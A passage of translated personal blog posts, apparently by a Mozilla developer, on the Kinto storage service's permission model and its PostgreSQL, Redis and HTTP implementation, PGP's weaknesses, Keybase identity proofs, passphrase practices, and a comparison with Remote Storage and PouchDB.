    '/buckets/blog/groups/moderators',
    'group',
    '/buckets/blog',
    '{"name": "moderators", "members": ["fxa:natim"]}'::JSONB,
    '{}', '{}');

This group can be managed by fxa:alexis, since he has the write permission on the parent bucket.

Collection

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog/collections/articles',
    'collection',
    '/buckets/blog',
    '{"name": "articles"}'::JSONB,
    '{"system.Everyone"}',
    '{"/buckets/blog/groups/moderators"}');

This collection of articles can be read by everyone, and managed by the members of the moderators group, as well as by fxa:alexis through the bucket.

Records

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog/collections/articles/records/02f3f76f-7059-4ae4-888f-2ac9824e9200',
    'record',
    '/buckets/blog/collections/articles',
    '{"name": "02f3f76f-7059-4ae4-888f-2ac9824e9200",
      "title": "Stocker les permissions", ...}'::JSONB,
    '{}', '{}');

Querying the permissions

Getting the list of “principals” of an ACE

As seen above, to check a permission we take the union of the principals required by the inherited objects, and test its intersection with the user's principals:

WITH required_principals AS (
     SELECT unnest(principals) AS p
       FROM perms
      WHERE ace IN (
         '/buckets/blog:write',
         '/buckets/blog:read',
         '/buckets/blog/collections/articles:write',
         '/buckets/blog/collections/articles:read')
 ),
 user_principals AS (
     SELECT unnest(principals) AS p
       FROM "user"
      WHERE id = 'fxa:natim'
 )
 SELECT COUNT(*)
   FROM user_principals a
  INNER JOIN required_principals b
     ON a.p = b.p;

Filtering objects by permission

To filter the objects, we do a simple array intersection (thank you PostgreSQL):

SELECT data
  FROM object o, "user" u
 WHERE o.type = 'record'
   AND o.parent_id = '/buckets/blog/collections/articles'
   AND (o.read_principals && u.principals OR
        o.write_principals && u.principals)
   AND u.id = 'fxa:natim';

Arrays index well, notably thanks to GIN indexes.

With Redis

Redis has several advantages for this kind of problem. In particular, it handles sets natively (collections of unique values), along with intersection and union operations.

With Redis, getting the principals for an ACE can be written like this:

SUNIONSTORE temp_perm:/buckets/blog/collections/articles:write  permission:/buckets/blog:write  permission:/buckets/blog/collections/articles:write
SINTER temp_perm:/buckets/blog/collections/articles:write principals:fxa:alexis

SUNIONSTORE creates a set containing the union of all the sets that follow. In our case we name it temp_perm:/buckets/blog/collections/articles:write and it contains the union of the following ACL sets:

permission:/buckets/blog:write
permission:/buckets/blog/collections/articles:write

SINTER returns the intersection of all the sets passed as parameters, in our case:

temp_perm:/buckets/blog/collections/articles:write
principals:fxa:alexis

More information:

http://redis.io/commands/sinter
http://redis.io/commands/sunionstore

If the set returned by the SINTER command is not empty, the user has the permission.

The temporary temp_perm key can then be deleted.

Using MULTI, we can even do all of this within a transaction and thereby guarantee the integrity of the query.
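From Python, the same sequence could look like the sketch below. It assumes `client` is a redis-py client (for example `redis.Redis()`), whose `pipeline(transaction=True)` wraps the queued commands in MULTI/EXEC; the `has_permission` function and the key prefixes simply mirror the commands above and are not an actual Kinto backend:

```python
def has_permission(client, object_ace, inherited_aces, user_id):
    """Return True if the user holds the ACE, directly or by inheritance.

    `client` is assumed to be a redis-py client; key names follow the
    permission:<ace> and principals:<user> convention used above.
    """
    temp_key = "temp_perm:" + object_ace
    source_keys = ["permission:" + ace for ace in [object_ace, *inherited_aces]]

    # Queue the three commands; they run together on execute().
    pipe = client.pipeline(transaction=True)
    pipe.sunionstore(temp_key, source_keys)
    pipe.sinter(temp_key, "principals:" + user_id)
    pipe.delete(temp_key)
    _, matching, _ = pipe.execute()

    # A non-empty intersection means at least one principal matches.
    return len(matching) > 0
```

Deleting the temporary key inside the same transaction keeps it from leaking if a later step fails.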

Conclusion

The solution looks simple, but it took us a lot of thought and several proposals to get there.

The final idea is to have:

A dedicated backend for storing the principals of users and of ACEs (e.g. with Redis sets);
The list of read and write principals on the objects table.

It's a pity to have the concept of permissions in two places, but this makes it possible to quickly determine a user's permission on an object, and also to retrieve all the objects of a collection for a user who does not have access to every record of the collection, or to every collection of the bucket.

The problems with PGP

2015-05-25T00:00:00+02:00

Flip a bit in the communication between sender and recipient and they will experience decryption or verification errors. How high are the chances they will start to exchange the data in the clear rather than trying to hunt down the man in the middle?

— http://secushare.org/PGP

Once past the euphoria of “we must use PGP for all our communications”, I realized through discussions that PGP has several problems, among them:

Metadata (including the conversation's “subject” field) is still exchanged in the clear (it is possible to know that a message was exchanged between given people, on a given date);
PGP builds on a communication protocol which is itself unencrypted, so it is easy either to make a mistake or to downgrade the conversation to an unencrypted mode;
It is easy to learn your social network with PGP, since the whole principle is to sign the keys of the people whose identity you vouch for;
If your private key leaks, every message that was encrypted to you with the matching public key is compromised. PGP is said not to provide forward secrecy;
Discovering peers' keys often happens in the clear, without a “secure” connection (HTTPS). Anyone can therefore see these exchanges and know whose key you are looking for;
Group discussions are very difficult: you have to encrypt for each recipient (or have them share a key pair).

I am currently digging into alternatives to PGP, for example Pond, which does not build on top of an already established standard, and therefore does not inherit its flaws (nor its already established network).

In the meantime, a few good practices for PGP ;)

Good practices

It is actually quite easy to use PGP the wrong way. Riseup has written an excellent guide explaining how to configure your setup correctly.

I have already mentioned it, but you absolutely must choose sufficiently long passphrases. They are not easy to remember, but they are essential. You can also keep a document, encrypted with a key that you never put online, containing these passphrases in case you forget them;
Generate 4096-bit RSA keys, using sha512;
Set an expiration date on your keys that is reasonably close (2 years). You can push that date back later if needed.

Among the most striking things I came across:

Use the --hidden-recipient flag with PGP so as not to reveal who the recipient of the message is;
Do not save draft messages to your server: they would be stored in the clear!
Use HKPS to communicate with key servers, otherwise all the traffic is in the clear.

The Bitmask project aims to make tools for encrypted messaging and VPN simple to use; one more thing to look into.

Anyway, there is work to do.

Simplifying identity proofs

2015-05-11T00:00:00+02:00

headline
What is Keybase.io, and how are they trying to simplify the creation of identity proofs?

One problem that remains largely unsolved in encrypted communication is key authenticity. If someone decides to publish a key in my name, using my email address, it is fairly easy for them to do so.

So there needs to be a way to prove that the public key I use is really mine.

Traditionally, I need to have my public key signed by other people, through an in-person meeting or exchanges outside the network. This is, for example, what happens at key signing parties.

A simple way to perform these checks would be to give, along with one's email address, one's key fingerprint, or at the very least a keyword that validates that the exchanges really come from the right person.

PGP offers a mechanism for signing other people's keys once they have been validated, which lets you place your trust in a key's signers.

Keybase.io is a service that aims to make creating these proofs easier, on the premise that various means can be used to prove people's identity: for example their Twitter or GitHub accounts, or their domain names. Just as it is possible to sign (validate) our friends' keys, it is possible to “track” them, in Keybase jargon.

So, in short, Keybase.io is a directory that tries to make creating proofs easier. Good.

A few grey areas

It is an American startup, incorporated in Delaware, which is known for being a tax haven in the very heart of the United States. I don't want to jump to conclusions, of course, so I opened a ticket on GitHub to find out more (after all, being in a tax haven may make it possible to escape certain laws on data requests). More surprising still, the startup has no business model for now (which in a sense is rather reassuring, even if one may wonder why create a startup in that case).

The service (although in alpha) is not released under a free license, which for now prevents anyone from running their own Keybase server. Some of the components, however, are open source.

I find it hard to believe in initiatives that want to save the world but do so on their own in a corner: I don't understand why there is no documentation on how to set up your own server, or on how to help them work on federation. But then, it is still a young initiative, and I am giving it the benefit of the doubt.

In the long run, an infrastructure like Keybase.io will obviously have to be distributed.

We’ve been talking about a total decentralization, but we have to solve a couple things, synchronization in particular. Right now someone can mirror us and a client can trust a mirror just as easily as the server at keybase.io, but there needs to be a way of announcing proofs to any server and having them cooperate with each other. We’d be so happy to get this right.

— Chris Coyne, co-founder of Keybase

To do without their centralized service, the generated proofs (which are the strength of the system they are building) could be exported to existing key servers. This is something they want to do.

In short, an important and useful initiative all the same, even if it raises questions that deserve a bit of attention.

Other projects with similar goals exist as well, through the LEAP project, but I have not dug into them yet.

Passphrases and good practices

2015-05-09T00:00:00+02:00

headline
Communicating in an encrypted way is not easy, and requires memorizing complex passphrases. How do we cope?

Unlike other passwords, cryptographic passwords specifically need to be long and extremely hard to guess. The reason is that a computer (or a cluster of several computers) can be programmed to make trillions of attempts automatically. If the chosen password is too weak or built in too predictable a way, this brute-force attack could succeed by trying every possibility.

-- The Electronic Frontier Foundation (rendered back into English from the author's French translation)

Understanding the concepts and the ecosystem that make an encrypted digital life possible is not easy. Several guides have been written on the subject, and yet I realize that it is possible to naively misuse the existing tools.

Use a good password for your user account and a good passphrase to protect your secret key. This passphrase is the weakest part of the whole system.

-- The GPG manual page.

A passphrase should:

Be long enough to be hard to guess;
Not be a well-known quotation (literature, holy books, etc.);
Be hard to guess even for those close to you;
Be easy to remember and to type;
Be unique and not shared between different sites, applications, etc.

One technique is to use dictionary words, selected at random and then modified.
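The random selection step can be sketched in a few lines of Python. This assumes you supply your own word list (the short `SAMPLE_WORDS` list below is a made-up placeholder, far too small for real use) and it leaves the manual “then modified” step to you:

```python
import secrets

# Placeholder list for illustration; a real list should hold
# thousands of words so that each pick adds enough entropy.
SAMPLE_WORDS = ["correct", "horse", "battery", "staple", "orbit", "velvet"]


def generate_passphrase(wordlist, word_count=6):
    """Pick words uniformly at random with a cryptographic RNG."""
    if not wordlist:
        raise ValueError("the word list must not be empty")
    return " ".join(secrets.choice(wordlist) for _ in range(word_count))


print(generate_passphrase(SAMPLE_WORDS))
```

The `secrets` module is used rather than `random` because the latter is not designed for security-sensitive choices.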

Micah Lee is also working on a tool that aims to make passphrases easier to memorize, by repeating them at increasingly long intervals.

Yes, it is not as simple as it seems. For my part, I keep a local copy of my keys in a file encrypted with another key, which I generated for the occasion and will not share. I have also configured my text editor so that it can encrypt text documents by default.

So I regenerated my work and personal keys once more, using more complex passphrases.

There remains the question of backing up these private keys in encrypted form, which I have not solved yet. In short, all of this seems too complicated to explain successfully to novices, some of whom are not even convinced of the point of it all.

Service de Nuages: Permission management

2015-05-01T00:00:00+02:00

This article is reposted from “Service de Nuages”, my team's blog at Mozilla.

In building a service for storing personal data (Kinto), permission management is one of the big challenges: who should have access to what, and how do we define it?

tl;dr: Some notes on the vocabulary of permission systems and on our ideas for implementing permissions in a generic storage service.

The problem

The problem is simple: data is stored online, and there has to be a way to share it with other people.

Looking at the use cases, we notice that there are several kinds of users:

“end” users (you);
the applications that act on their behalf.

Not all actors have the same rights, then: some must be able to read, others to write, others still to create new records, and the control must be fine-grained: it must be possible to read one record but not another, for example.

We started from the observation that the available solutions did not meet these needs satisfactorily.

A vocabulary problem

The main problem we ran into during our discussions was vocabulary.

The various terms are explained below.

The concept of “principal”

A principal, in computer security, is an entity that can be authenticated by a computer system. [1] In French it is the “commettant”, the actor who commits the action (yes, the term is rather abstract!)

It can be an individual, a computer, a service, or a group of any of these entities, which is broader than the classic “user id”.

Permissions are then associated with these principals.

For example, a user is uniquely identified at login by the authentication system, whose role is to define a list of principals for the user logging in.

[1]	To learn more about principals: https://en.wikipedia.org/wiki/Principal_%28computer_security%29

The difference between role and group

At first glance, it is not obvious how to precisely define the difference between these two concepts, both of which make it possible to associate permissions with a group of principals. [2]

The difference is mainly semantic. But it can be seen as a difference in the “direction” of the relationship between the two concepts.

A role is a list of permissions that is associated with a principal.
A group is a list of principals that can be associated with a permission.
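The two directions can be made concrete with a pair of lookups. All names and contents below are invented for illustration:

```python
# Role: a list of permissions, attached to a principal.
ROLE_PERMISSIONS = {"editor": {"articles:read", "articles:write"}}
PRINCIPAL_ROLES = {"fxa:alexis": {"editor"}}

# Group: a list of principals, attached to a permission.
GROUP_MEMBERS = {"group:moderators": {"fxa:natim", "fxa:remy"}}
PERMISSION_GROUPS = {"articles:write": {"group:moderators"}}


def allowed_through_roles(principal, permission):
    """Start from the principal and look at the permissions of its roles."""
    return any(
        permission in ROLE_PERMISSIONS[role]
        for role in PRINCIPAL_ROLES.get(principal, set())
    )


def allowed_through_groups(principal, permission):
    """Start from the permission and look at the members of its groups."""
    return any(
        principal in GROUP_MEMBERS[group]
        for group in PERMISSION_GROUPS.get(permission, set())
    )
```

Both answer the same question; they only differ in which side of the relationship holds the list.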

[2]	More information: http://stackoverflow.com/questions/7770728/group-vs-role-any-real-difference

The difference between permission, ACL and ACE

An ACL is a list of Access Control Entries (ACE) granting or removing access rights to a person or a group.

—https://fr.wikipedia.org/wiki/Access_Control_List

I would go even further: in our case, “to a principal”. For example:

create_record: alexis,remy,tarek

This ACE gives the create permission on the record object to the users Tarek, Rémy and Alexis.

Delegating permissions

Imagine the following example, where a user stores two kinds of data online:

contacts;
a to-do list whose tasks can be linked to those contacts.

The user has full rights over their data.

However, they use two applications, which should each have restricted access:

a contact management application, to which they want to delegate full management of their contacts: contacts:write;
a task management application, to which they want to delegate the management of tasks: contacts:read tasks:write

They want the contacts application to be unable to access their tasks, and the tasks application to be unable to modify existing contacts, only possibly create new ones.

So they need a way to delegate some of their rights to a third party (the application).

This is precisely the role of OAuth2 scopes.

When a user logs in, a window asks which access they want to grant to the application that will act on their behalf.

The service then gets access to these scopes by inspecting the authentication token being used. This information must be treated as user input (that is, it cannot be trusted). It expresses what the user wants.

Yet it is also possible that the user does not have access to the data being requested. The service must therefore use two levels of permissions: those of the user, and those that were delegated to the application.
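In other words, a request goes through only if both levels agree. A minimal sketch of that double check, where the function name and the flat "object:permission" strings are assumptions made for the example:

```python
def is_request_allowed(permission, user_permissions, token_scopes):
    """Both the user and the delegated scopes must grant the permission."""
    return permission in user_permissions and permission in token_scopes


# What the user can actually do on the service.
USER_PERMISSIONS = {"contacts:read", "contacts:write", "tasks:read", "tasks:write"}
# What was delegated to the task management application.
TASKS_APP_SCOPES = {"contacts:read", "tasks:write"}

print(is_request_allowed("tasks:write", USER_PERMISSIONS, TASKS_APP_SCOPES))
print(is_request_allowed("contacts:write", USER_PERMISSIONS, TASKS_APP_SCOPES))
```

The scopes can only narrow what the user is allowed to do; they never grant anything the user does not already have.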

Namespaces

In our initial implementation of Kinto (our storage service, under construction), the namespace was implicit: the stored data was necessarily that of the logged-in user.

A user's data was therefore siloed and impossible to share.

Using namespaces is a simple way to handle data sharing.

We chose to follow the model of GitHub and Bitbucket, which use “organizations” as namespaces.

In our case, it is possible to create “buckets”, which correspond to these namespaces. A bucket is a container for collections and user groups.

The ACLs on these collections can be granted to some of the bucket's groups as well as directly to other principals.

Our API proposal

The objects involved

To implement permission management, we identified the following objects:

Object	Description
bucket	Buckets can be seen as namespaces. They make it possible to have different collections with the same name, stored in different buckets so that their data stays separate.
collection	A list of records.
record	A record of a collection.
group	A group of principals (“commettants”).

For the definition of ACLs there is a hierarchy, and objects “inherit” the ACLs of their parents:

           +---------------+
           | Bucket        |
           +---------------+
    +----->+ - id          +<---+
    |      | - permissions |    |
    |      +---------------+    |
    |                           |
    |                           |
    |                           |
    |                           |
    |                           |
+---+-----------+        +------+---------+
| Collection    |        | Group          |
+---------------+        +----------------+
| - id          |        |  - id          |
| - permissions |        |  - members     |
+------+--------+        |  - permissions |
       ^                 +----------------+
       |
       |
+------+---------+
| Record         |
+----------------+
|  - id          |
|  - data        |
|  - permissions |
+----------------+

Permissions

For each of these objects we identified the following permissions:

Permission	Description
read	Permission to read the content of the object and of its sub-objects.
write	Permission to modify and administer an object and its sub-objects. The write permission allows reading, modifying and deleting an object, as well as managing its permissions.
create	Permission to create the specified sub-object. For example: `collections:create`

Each permission specified on an object is associated with a list of principals.

For the create permission, the child object in question has to be specified, because an object can have several types of children. For example: collections:create, groups:create.

For now we have no delete or update permission, since we have not found a use case that requires them. Anyone with write access can therefore delete a record.

An object's permissions are inherited from its parent. For example, a record created in a collection that is readable by everyone will itself be readable by everyone.

Permissions are therefore cumulative. In other words, an object cannot have more restrictive permissions than its parent.

Here is the exhaustive list of permissions:

Object	Associated permissions	Comment
Configuration (.ini)	buckets:create	The principals allowed to create a bucket are defined in the server configuration (e.g. authenticated users).
`bucket`	write	In a way, this is the right to administer the bucket.
	read	The right to read the content of all the objects in the bucket.
	collections:create	Permission to create collections in the bucket.
	groups:create	Permission to create groups in the bucket.
`collection`	write	Permission to administer all the objects in the collection.
	read	Permission to view all the objects in the collection.
	records:create	Permission to create new records in the collection.
`record`	write	Permission to modify or share the record.
`record`	read	Permission to view the record.
`group`	write	Permission to administer the group.
`group`	read	Permission to view the members of the group.

The “principals”

Actors connecting to the storage service can authenticate.

They then receive a list of principals:

Everyone: the principal given to all actors (authenticated or not);
Authenticated: the principal given to all authenticated actors;
a principal identifying the actor, for example fxa:32aa95a474c984d41d395e2d0b614aa2

To avoid identifier collisions, the actor's principal depends on their authentication type (system, basic, ipaddr, hawk, fxa) and on their identifier (unique per actor).

Depending on the bucket on which the action takes place, the groups the user belongs to are also added to their list of principals: group:moderators, for example.

So if Bob logs in with Firefox Accounts on the servicedenuages_blog bucket, where he belongs to the moderators group, he will have the following list of principals: Everyone, Authenticated, fxa:32aa95a474c984d41d395e2d0b614aa2, group:moderators

It is therefore possible to grant a permission to Bob using any one of these four principals.
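Building that list can be sketched as follows. The `build_principals` function and its parameters are hypothetical; only the principal names and the type:id format come from the description above:

```python
def build_principals(auth_type, user_id, bucket_groups):
    """Return the principals of an actor for a given bucket.

    `user_id` is None for an anonymous actor; `bucket_groups` holds the
    names of the groups the actor belongs to in the current bucket.
    """
    principals = ["Everyone"]
    if user_id is not None:
        principals.append("Authenticated")
        # Prefixing with the authentication type avoids id collisions.
        principals.append(f"{auth_type}:{user_id}")
        principals.extend(f"group:{name}" for name in bucket_groups)
    return principals


print(build_principals("fxa", "32aa95a474c984d41d395e2d0b614aa2", ["moderators"]))
```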

Note

The <userid> principal depends on the authentication back-end (e.g. github:leplatrem).

A few examples

Blog

Object	Permissions	Principals
`bucket:blog`	`write`	`fxa:<blog owner id>`
`collection:articles`	`write`	`group:moderators`
`collection:articles`	`read`	`Everyone`
`record:569e28r98889`	`write`	`fxa:<co-author id>`

Wiki

Object	Permissions	Principals
`bucket:wiki`	`write`	`fxa:<wiki administrator id>`
`collection:articles`	`write`	`Authenticated`
`collection:articles`	`read`	`Everyone`

Polls

Object	Permissions	Principals
`bucket:poll`	`write`	`fxa:<admin id>`
`bucket:poll`	`collections:create`	`Authenticated`
`collection:<poll id>`	`write`	`fxa:<poll author id>`
`collection:<poll id>`	`records:create`	`Everyone`

Collaborative maps

Object	Permissions	Principals
`bucket:maps`	`write`	`fxa:<admin id>`
`bucket:maps`	`collections:create`	`Authenticated`
`collection:<map id>`	`write`	`fxa:<map author id>`
`collection:<map id>`	`read`	`Everyone`
`record:<record id>`	`write`	`fxa:<maintainer id>` (e.g. event staff member maintaining venues)

Platforms

Of course, there are several ways to model typical use cases. For example, one can imagine a wiki platform (à la wikia.com), where wikis are private by default and certain pages can be made public:

Object	Permissions	Principals
`bucket:freewiki`	`write`	`fxa:<administrator id>`
	`collections:create`	`Authenticated`
	`groups:create`	`Authenticated`
`collection:<wiki id>`	`write`	`fxa:<wiki owner id>`, `group:<editors id>`
`collection:<wiki id>`	`read`	`group:<readers id>`
`record:<page id>`	`read`	`Everyone`

The HTTP API

When an object is created, the user is granted the write permission on that object:

PUT /v1/buckets/servicedenuages_blog HTTP/1.1
Authorization: Bearer 0b9c2625dc21ef05f6ad4ddf47c5f203837aa32ca42fced54c2625dc21efac32
Accept: application/json

HTTP/1.1 201 Created
Content-Type: application/json; charset=utf-8

{
    "id": "servicedenuages_blog",
    "permissions": {
        "write": ["fxa:49d02d55ad10973b7b9d0dc9eba7fdf0"]
    }
}

Permissions can be added using PATCH:

PATCH /v1/buckets/servicedenuages_blog/collections/articles HTTP/1.1
Authorization: Bearer 0b9c2625dc21ef05f6ad4ddf47c5f203837aa32ca42fced54c2625dc21efac32
Accept: application/json

{
    "permissions": {
        "read": ["+system.Everyone"]
    }
}

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{
    "id": "articles",
    "permissions": {
        "write": ["fxa:49d02d55ad10973b7b9d0dc9eba7fdf0"],
        "read": ["system.Everyone"]
    }
}

With PATCH, we use a syntax where each principal is prefixed with a + or a - to add it to, or remove it from, an ACL.
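To make the +/- syntax concrete, here is a minimal sketch of how a server could apply such a patch to an ACL. The function name `apply_permission_patch` and the plain-dict representation of the ACL are assumptions made for illustration, not Kinto's actual implementation.

```python
def apply_permission_patch(acl, patch):
    """Return a copy of `acl` with "+principal" / "-principal" changes applied."""
    result = {perm: list(principals) for perm, principals in acl.items()}
    for perm, changes in patch.items():
        principals = result.setdefault(perm, [])
        for change in changes:
            sign, principal = change[:1], change[1:]
            if sign not in ("+", "-") or not principal:
                raise ValueError("expected '+principal' or '-principal', got %r" % change)
            if sign == "+" and principal not in principals:
                principals.append(principal)
            elif sign == "-" and principal in principals:
                principals.remove(principal)
    return result


# Same data as the PATCH example above.
acl = {"write": ["fxa:49d02d55ad10973b7b9d0dc9eba7fdf0"]}
patched = apply_permission_patch(acl, {"read": ["+system.Everyone"]})
```

Returning a copy rather than mutating the stored ACL keeps the sketch easy to test; a real server would also have to persist the result.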

It is also possible to use PUT to reset the ACLs. Note that PUT automatically adds the current user to the list, although they can remove themselves afterwards with a PATCH. Adding the current user avoids situations where nobody has access to the data anymore.

Note

The create permission applies to POST, but also to PUT when the record does not exist.

The specific case of user data

One of Kinto’s current features is the ability to manage per-user collections of records.

On *nix, an application can save the current user’s configuration in their home directory, without worrying about its location on disk, by using ~/.

In our case, if an application wants to save a user’s contacts, it can use the ~ shortcut to refer to the user’s personal bucket: /buckets/~/collections/contacts

This URL returns an HTTP 307 redirect to the current user’s bucket:

POST /v1/buckets/~/collections/contacts/records HTTP/1.1

{
   "name": "Rémy",
   "emails": ["remy@example.com"],
   "phones": ["+330820800800"]
}

HTTP/1.1 307 Temporary Redirect
Location: /v1/buckets/fxa:49d02d55ad10973b7b9d0dc9eba7fdf0/collections/contacts/records

This makes it entirely possible for Alice to share her contacts with Bob. She just needs to give Bob the read permission on her collection, and give him the full URL /v1/buckets/fxa:49d02d55ad10973b7b9d0dc9eba7fdf0/collections/contacts/records.
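The ~ shortcut boils down to rewriting the bucket segment of the path before answering with a redirect. A minimal sketch, assuming a hypothetical helper `resolve_personal_bucket` that receives the request path and the authenticated user id:

```python
def resolve_personal_bucket(path, user_id):
    """Return the redirect target for a path using the ~ bucket, else None."""
    parts = path.split("/")
    try:
        idx = parts.index("buckets")
    except ValueError:
        return None
    # Only the segment right after "buckets" is treated as the bucket id.
    if idx + 1 < len(parts) and parts[idx + 1] == "~":
        parts[idx + 1] = user_id
        return "/".join(parts)
    return None


location = resolve_personal_bucket(
    "/v1/buckets/~/collections/contacts/records",
    "fxa:49d02d55ad10973b7b9d0dc9eba7fdf0",
)
```

When the function returns a path, the server would answer with a 307 and that path in the Location header; when it returns None, the request is handled normally.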

Delegating permissions

For Kinto, we defined a format to restrict permissions using OAuth2 scopes: storage:<bucket_id>:<collection_id>:<permissions_list>.

So, going back to the earlier to-do list example, Bob can create a specific OAuth token with the following scopes: profile storage:todolist:tasks:write storage:~:contacts:read+records:create

So, although Bob has the write permission on his contacts, the application using this token will only be able to read existing contacts and add new ones.
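Here is a rough sketch of how such scopes could be parsed and checked. The helper names are hypothetical, and the sketch assumes that permissions in the list are separated by + and that only the first three colons are separators (so that `records:create` stays in one piece). It does not model any implication between permissions, such as write implying read.

```python
def parse_storage_scope(scope):
    """Split "storage:<bucket>:<collection>:<perm>+<perm>" into its parts."""
    prefix, bucket, collection, permissions = scope.split(":", 3)
    if prefix != "storage":
        raise ValueError("not a storage scope: %r" % scope)
    return bucket, collection, set(permissions.split("+"))


def token_allows(scopes, bucket, collection, permission):
    """Tell whether a space-separated scope string grants `permission`."""
    for scope in scopes.split():
        if not scope.startswith("storage:"):
            continue  # e.g. "profile", unrelated to storage
        scope_bucket, scope_collection, perms = parse_storage_scope(scope)
        if (scope_bucket, scope_collection) == (bucket, collection) and permission in perms:
            return True
    return False


bob_scopes = "profile storage:todolist:tasks:write storage:~:contacts:read+records:create"
```

With Bob's token, `token_allows(bob_scopes, "~", "contacts", "read")` is true while the same call with `"write"` is false, which matches the restriction described above.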

Part of the complexity therefore lies in presenting these scopes to users in a readable way, so they can choose which permissions to grant to the applications acting on their behalf.

That’s where we currently are in our thinking!

If you have things to add, points of disagreement or other thoughts, feel free to interrupt us while there is still time!

Ecosystem and generic storage

2015-04-30T00:00:00+02:00

tl;dr We have to build a payment tracking service, and we are wondering whether to keep pushing ahead with our own storage/synchronisation solution.

As we wrote in the previous article, we want to build a generic storage solution. We’re redoing Daybed at Mozilla!

Our goal is simple: let application developers, whether inside Mozilla or anywhere in the world, easily persist and synchronise data associated with a user.

The aspects of the architecture that we consider essential:

The solution must rely on a protocol, not on an implementation;
Self-hosting the whole thing must be dead simple;
Authentication must be pluggable, or even decentralised (OAuth2, FxA, Persona);
The server must be able to validate records;
Data must be storable in any backend;
A permission system must make it possible to protect collections, or to share records in a fine-grained way;
Conflict resolution must be able to happen on the server;
The client must be designed “offline-first”;
The client must be able to reconcile data simply;
The client must be usable both in the browser and on the server side;
All components must be simple and easily replaceable.

The first question we were asked was “Why don’t you use PouchDB or Remote Storage?”

Remote Storage

Remote Storage is an open standard for per-user storage. The specification builds on existing, proven standards: Webfinger, OAuth 2, CORS and REST.

The API is simple, and prestigious projects use it. There are several server implementations, and there is a Node skeleton for building a custom server.

The remoteStorage.js client makes it possible to integrate the solution into Web applications. It takes care of the “local store”, caching and synchronisation, and provides a widget that lets application users choose the server that will receive the data (via Webfinger).

ludbud, the stripped-down version of remoteStorage.js, is limited to abstracting remote storage. Eventually, this would make it possible to have a single library for storing data in a remoteStorage server, in ownCloud, or with the bad guys like Google Drive or Dropbox.

At first glance, the specification matches what we want to achieve:

The philosophy of the protocol is sound;
The ecosystem is well put together;
The political vision fits: giving users back control over their data (see unhosted);
The technical choices are compatible with what we have started (CORS, REST, OAuth 2).

However, when it comes to data manipulation, there are several differences with what we want to do:

The API broadly follows a “files” metaphor (folders/documents) rather than a “data” one (collections/records);
There is no validation of records against a schema (even though some implementations of the protocol do it);
There is no way to sort/filter records by attribute;
Permissions are limited to private/public (and the author is rather considering a Git-like model)[1].

In short, it seems that what we want to do with validated record storage is complementary to Remote Storage.

If “file”-oriented persistence needs come up, we would, a priori, be wrong to reinvent the solutions this specification provides. So there is a good chance that we will integrate it eventually, and that Remote Storage will become one facet of our solution.

PouchDB

PouchDB is a JavaScript library for manipulating records locally and synchronising them to a remote database.

var db = new PouchDB('dbname');

db.put({
 _id: 'dave@gmail.com',
 name: 'David',
 age: 68
});

db.replicate.to('http://example.com/mydb');

The project has the wind in its sails and benefits from many contributors. Its ecosystem is very rich, and adoption by projects like Hoodie only confirms how relevant the tool is for frontend developers.

PouchDB manages a local “store”, whose persistence is abstracted and relies on the LevelDown API to persist data in any backend.

Even though PouchDB mainly addresses the needs of “offline-first” applications, it can be used both in the browser and on the server side, via Node.

Synchronisation

Synchronisation (or replication) of local data is done against a remote CouchDB.

The PouchDB Server project implements the CouchDB API in NodeJS. Since it uses PouchDB, the result is a service that behaves like CouchDB but stores its data anywhere, in Redis or PostgreSQL for example.

Synchronisation is complete. In other words, every record on the server ends up synchronised to the client. It is possible to filter the synchronised collections, but this is not meant to secure access to data.

The recommended approach for partitioning data by user is to create one database per user.

This is not necessarily a problem: CouchDB supports hundreds of thousands of databases without breaking a sweat. But depending on the use case, the partitioning is not always easy to determine (by role, by application, by collection, …).

The “Payments” use case

In the coming weeks, we will have to put together a prototype to track a user’s payment and subscription history.

The need is simple:

the “Payment” application records a user’s payments and subscriptions for a given application;
the “given” application queries the service to check that a user has paid or is subscribed;
the user queries the service to get the list of all their subscriptions.

Only the “Payment” application is allowed to create/modify/delete records; the other two only have read-only access.

A given application cannot access other applications’ payments, and a user cannot access other users’ payments.
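These rules are small enough to be written down as a single predicate. The sketch below is only an illustration of the requirement: the `Principal` and `PaymentRecord` types and the `can_access` function are hypothetical names, not part of any existing service.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    kind: str   # "payment_app", "app" or "user"
    ident: str  # application id or user id


@dataclass(frozen=True)
class PaymentRecord:
    user_id: str
    app_id: str


def can_access(principal, record, action):
    """Apply the access rules stated above to one record."""
    if principal.kind == "payment_app":
        return True  # full rights: create, modify, delete, read
    if action != "read":
        return False  # everyone else is read-only
    if principal.kind == "app":
        return principal.ident == record.app_id
    if principal.kind == "user":
        return principal.ident == record.user_id
    return False


record = PaymentRecord(user_id="alice", app_id="marketplace")
```

Any storage solution we pick has to be able to express this predicate, which is what the next two sections check for RemoteStorage and PouchDB.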

With RemoteStorage

Clearly, the idea behind RemoteStorage is to decouple the running application from the data the user creates with it.

In our case, it is the “Payment” application that manipulates data about a user. But that data does not directly belong to the user: granted, a user must be able to delete it, but definitely not create or modify it!

Permissions limited to private/public are not enough in this specific case.

With PouchDB

We would have to create one database per user in order to isolate records securely. Only the “Payment” application would have full rights on the databases.

But that is not enough.

An application must not be able to see other applications’ payments, so we would also have to partition again and create one database per application.

When a user wants to access all of their payments, the databases of all applications will have to be aggregated. When the marketing team wants statistics across all applications, hundreds of thousands of databases will have to be aggregated.

Which is a real shame, since a user’s payments or subscriptions for a given application can probably be counted on the fingers of one hand. Hundreds of thousands of databases containing fewer than 5 records each?

Moreover, in the case of the “Payment” application, the server is implemented in Python. Using a JavaScript wrapper, as python-pouchdb does, is not something we are thrilled about.

A new ecosystem?

Obviously, given the richness of the PouchDB and Remote Storage projects and the momentum of their communities, it is legitimate to hesitate before developing an alternative solution.

When we created the Reading List server, we built it with Cliquet. It was an opportunity to develop a very simple protocol, strongly inspired by Firefox Sync, for synchronising records.

And if the Reading List clients could be implemented in a few weeks, whether in JavaScript, Java (Android) or ASM (Firefox add-on), it is because the “offline first” principle of the service is trivial.

The trade-offs

Obviously, we do not claim to compete with CouchDB. We are making several concessions:

By default, collections of records are partitioned by user;
No revision history;
No diff of records between revisions;
By default, no automatic conflict resolution;
No synchronisation through streams.

Until proven otherwise, these trade-offs rule out implementing a PouchDB adapter for synchronisation with Cliquet’s HTTP protocol.

